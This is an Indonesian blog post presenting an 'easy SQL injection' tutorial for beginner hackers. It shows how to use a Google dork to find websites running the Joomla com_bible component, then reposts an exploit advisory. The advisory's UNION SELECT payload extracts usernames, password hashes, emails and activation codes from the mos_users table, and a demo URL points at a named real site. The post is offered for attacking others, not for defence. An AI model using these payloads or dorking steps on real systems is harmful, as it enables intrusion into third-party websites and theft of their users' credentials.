|

cara SQL injection paling mudah

banyak orang yang ingin belajar web hacking mengira SQL injection itu sangatlah susah,,, kali ini saya akan memberikan cara paling mudah untuk SQL injection atau lebih sering di sebut " SQL injection bagi pemalas " wkwkwkwk....
coba bayangkan, saking mudahnya sampai di sebut bagi Pemalas,,,hihihi


sebelumnya saya mohon maaf kepada para master karena info ini sangatlah jadul, namun saya hanya ingin berbagi, kepada newbie2 seperti saya ini,,,

info yang ingin saya share kali ini adalah menyangkut ttg " SQL Injection joomla exploit vulnerability"

sebelum melanjutkan artikel ini, saya ingin mengajukan penawaran
itu adalah buku pegangan keren seorang hacker,, jika anda ingin menjadi hacker,, baca dulu buku itu,,,

oke, tanpa basa basi lagi,
pada artikel ini saya memberikan contoh exploit pada : com_bible ..
oke,
langkah pertama yang kita lakukan mencari sebuah web yang kita duga bisa kita inject..
buka http://google.com kemudian ketikkan inurl:"/index.php?option=com_bible"
nah, jika kita menginginkan untuk hack suatu web dari negara tertentu,, maka tambahkan site:[jenis domain suatu negara]
inurl:"/index.php?option=com_bible" kemudian tekan enter
setelah itu kita akan di bawa keu sebuah halaman yang menampilkan web2 terkandung component bible pada joomla,,,,
pilih salah satu web nya,,,

nah, sekarang saya akan memberikan bentuk contoh exploitnya:



[!] ===========================================================================[!]

[~] Joomla com_bible SQL Injection vulnerability
[~] Author : r3m1ck (mick.emo.boy@yahoo.com)
[~] Homepage : http://www.indonesiancoder.com , http://r3m1ck.us
[~] Date : 31 May, 2010
[~] location : Indonesia
[~] Dork : “aura_kasih”=p~

[!]===========================================================================[!]

[ Vulnerable File ]

http://site/index.php?option=com_bible&book=1&chapter=[INDONESIANCODER]

[ XpL ]

/index.php?option=com_bible&book=1&chapter=-50/**/UNION/**/SELECT/**/1,2,group_concat(username,0×3a,password,0×3a,email,0×3a,activation,0×3c62723e),4,5/**/FROM/**/mos_users–

or

another columns

[ d3m0 ]

http://www.throughfaith.org//index.php?option=com_bible&book=1&chapter=-50/**/UNION/**/SELECT/**/1,2,group_concat%28username,0×3a,password,0×3a,email,0×3a,activation,0×3c62723e%29r3m1ck,4,5/**/FROM/**/mos_users–

etc etc etc ;]

[!]===========================================================================[!]

[ Thx TO ]

[+] INDONESIAN CODER TEAM U3D Crew IndonesianHacker ARUMBIA TEAM
[+] tukulesto,M3NW5,arianom,kaMtiEz,N4CK0,Jundab,d0ntcry,bobyhikaru,gonzhack,senot
[+] Contrex,YadoY666,Pathloader,cimpli,MarahMerah,IBL13Z
[+] Coracore,Gh4mb4s,Jack-,VycOd,m0rgue,otong,CS-31,MISTERFRIBO,bejamz
[+] bumble_be,pL4nkt0n,yur4kh4,god~of~cats,eLisHa

[ NOTE ]

[+] Happy birthday to INDONESIAN CODER TEAM… sukses selaluuu !!! muach muach :-*
[+] WE ARE ONE UNITY, WE ARE A CODER FAMILY, AND WE ARE INDONESIAN CODER TEAM
[+] cayang icha miss u muach muach… :-*
[+] Bejamz : oi… ketemu di kampus ga nyapa lo,, =)) =))

[ QUOTE ]

[+] INDONESIANCODER still r0x
[+] U3D Crew still r4wX…
[+] ./e0f

Selamat Mencoba,,,
ditunggu komentarnya,,,,

bagi para pengunjung yang berbaik hati kepada kelangsungan blog ini,,, harap klik salah satu iklan dibawah

Posted by Ikhwanesia.com on 07.16. Filed under , , . You can follow any responses to this entry through the RSS 2.0. Feel free to leave a response

Blog Archive

Labels